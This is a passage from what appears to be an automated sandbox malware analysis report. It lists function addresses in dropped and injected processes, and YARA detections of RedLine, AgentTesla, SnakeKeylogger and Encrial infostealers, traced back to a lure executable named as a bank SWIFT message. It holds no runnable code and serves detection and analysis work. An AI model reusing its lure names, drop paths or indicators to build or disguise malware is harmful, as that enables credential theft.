                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E06D92_2_008E06D9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090B6CC2_2_0090B6CC
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008F467F2_2_008F467F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0092AACE2_2_0092AACE
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008DFA572_2_008DFA57
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008F4BEF2_2_008F4BEF
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008D3B702_2_008D3B70
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008E9ED02_2_008E9ED0
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008DFE6F2_2_008DFE6F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008C6F072_2_008C6F07
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_008CAF502_2_008CAF50
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_015D35E82_2_015D35E8
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00408C605_2_00408C60
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040DC115_2_0040DC11
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407C3F5_2_00407C3F
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00418CCC5_2_00418CCC
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00406CA05_2_00406CA0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004028B05_2_004028B0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041A4BE5_2_0041A4BE
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004182445_2_00418244
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004016505_2_00401650
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00402F205_2_00402F20
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004193C45_2_004193C4
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004187885_2_00418788
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00402F895_2_00402F89
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00402B905_2_00402B90
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004073A05_2_004073A0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BBD5805_2_04BBD580
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04B87F805_2_04B87F80
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BB37805_2_04BB3780
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BBC7F05_2_04BBC7F0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BC00D95_2_04BC00D9
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BC39A35_2_04BC39A3
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04B86EAF5_2_04B86EAF
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BB59805_2_04BB5980
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04B851EE5_2_04B851EE
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04B87B715_2_04B87B71
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_05B810305_2_05B81030
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_05B810205_2_05B81020
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeCode function: 11_2_00FD85C811_2_00FD85C8
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 12_2_0283C54812_2_0283C548
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 12_2_02832DD112_2_02832DD1
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 12_2_0283988812_2_02839888
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 12_2_0283C53912_2_0283C539
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 12_2_0283965C12_2_0283965C
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04AB41C813_2_04AB41C8
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04AB3E8013_2_04AB3E80
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04ABDF0013_2_04ABDF00
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04ABEA8013_2_04ABEA80
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04AB4A9813_2_04AB4A98
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04ABAA4213_2_04ABAA42
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_04ABDF0013_2_04ABDF00
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E7E7813_2_061E7E78
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E56B813_2_061E56B8
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061EC2A013_2_061EC2A0
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E66E813_2_061E66E8
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061EB32A13_2_061EB32A
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E317813_2_061E3178
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E235013_2_061E2350
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E779813_2_061E7798
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E000613_2_061E0006
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E004013_2_061E0040
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061EE4C013_2_061EE4C0
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E5DDF13_2_061E5DDF
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_061E003813_2_061E0038
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0467B49815_2_0467B498
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0467B48815_2_0467B488
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_0654DAAC20_2_0654DAAC
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_06541B9420_2_06541B94
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_0654E62120_2_0654E621
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_0654255F20_2_0654255F
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065425B820_2_065425B8
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065425A820_2_065425A8
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_0654417420_2_06544174
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_06541D2020_2_06541D20
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 20_2_065B336020_2_065B3360
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 26_2_016A902826_2_016A9028
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 26_2_016A500026_2_016A5000
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 29_2_00EAB33829_2_00EAB338
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 31_2_011FF36031_2_011FF360
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 33_2_00D1862833_2_00D18628
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00408C6034_2_00408C60
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0040DC1134_2_0040DC11
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00407C3F34_2_00407C3F
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00418CCC34_2_00418CCC
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00406CA034_2_00406CA0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_004028B034_2_004028B0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0041A4BE34_2_0041A4BE
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0041824434_2_00418244
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0040165034_2_00401650
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00402F2034_2_00402F20
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_004193C434_2_004193C4
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_0041878834_2_00418788
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00402F8934_2_00402F89
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_00402B9034_2_00402B90
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_004073A034_2_004073A0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E8D58034_2_04E8D580
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E8C7F034_2_04E8C7F0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E57F8034_2_04E57F80
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E8378034_2_04E83780
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E900D934_2_04E900D9
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E551EE34_2_04E551EE
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E939A334_2_04E939A3
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E8598034_2_04E85980
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E56EAF34_2_04E56EAF
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E9515C34_2_04E9515C
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_04E57B7134_2_04E57B71
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_05BD103034_2_05BD1030
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_08474BC034_2_08474BC0
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 34_2_08474BB134_2_08474BB1
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\TrojanAI.exe 36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040D606 appears 48 times
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 86 times
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: String function: 008EF8A0 appears 31 times
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: String function: 008E6AC0 appears 42 times
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: String function: 000A6AC0 appears 42 times
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: String function: 000AF8A0 appears 31 times
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 33.2.spadixes.exe.35a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 2.2.spadixes.exe.3cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                          Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                          Source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 26.2.spadixes.exe.3f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 31.2.spadixes.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 29.2.spadixes.exe.3680000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 34.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 34.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                          Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                          Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                          Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                          Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
